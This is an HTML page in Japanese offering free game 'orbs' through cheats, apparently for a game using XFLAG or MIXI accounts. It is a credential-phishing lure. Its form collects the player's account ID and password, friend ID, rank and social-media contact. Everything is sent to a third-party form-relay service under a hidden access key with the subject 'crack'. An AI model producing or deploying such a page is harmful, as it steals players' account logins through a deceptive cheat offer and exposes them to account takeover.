<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>main_frontsight</title>
    <link rel="stylesheet" href="style.css" />
  </head>
<style>
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background-color: #f9f9f9;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
}

form {
background-color: #fff;
padding: 30px;
border-radius: 10px;
box-shadow: 0 0 20px rgba(0, 0, 0, 0.2);
max-width: 400px;
width: 100%;
margin: 10px 0;
}

h2 {
text-align: center;
color: #ff6363;
margin-bottom: 20px;
}

label {
display: block;
margin: 15px 0 5px;
font-weight: bold;
color: #555;
}

input, select, textarea {
width: 100%;
padding: 10px;
margin-bottom: 15px;
box-sizing: border-box;
border: 1px solid #ccc;
border-radius: 6px;
}

textarea {
resize: vertical;
}

button {
background-color: #ff6363;
color: #fff;
padding: 12px 20px;
border: none;
border-radius: 6px;
cursor: pointer;
width: 100%;
display: inline-block;
}

button:hover {
background-color: #ff4747;
}
</style>

  <body>
<div class="contact-form">
    <p class="title">Rs Hacksチートオーブ無料代行 今だけ(BAN対策付き)</p>

    <form action="https://api.staticforms.xyz/submit" method="post">
      <input type="hidden" name="accessKey" value="f29170f3-32ab-442d-a811-74ab2605505f">
      <input type="hidden" name="subject" value="crack">

             <div class="item">
          <label class="label">XFLAG IDまたはMIXI ID</label>
        <input type="text" class="inputs" name="name" required>
      </div>
   <div class="item">
          <label class="label">XFLAG IDの方はパスワード</label>
        <input type="text" class="inputs" name="name"/>
      </div>
   <div class="item">
          <label class="label">フレンドID</label>
        <input type="text" class="inputs" name="name" required>
      </div>
   <div class="item">
          <label class="label">プレイヤーランク</label>
         <input type="text" class="inputs" name="name" required>
      </div>
   <div class="item">
          <label class="label">現在のオーブ数</label>
         <input type="text" class="inputs" name="name"/>
      </div>
   <div class="item">
          <label class="label">連絡用のSNSのお名前(X、Discord、LINE、パラレルなど)</label>
          <input type="text" class="inputs" name="name"/>
      </div>

 <div>
        <div class="item">
          <label class="label">依頼するオーブ数</label>
         <input type="text" class="inputs" name="name"/>
      </div>
        </div>
   <br> 
        <div class="button-area">
          <input type="submit" value="依頼する" />
        </div>
      </div>
    </form>
</div>
  </body>
</html>

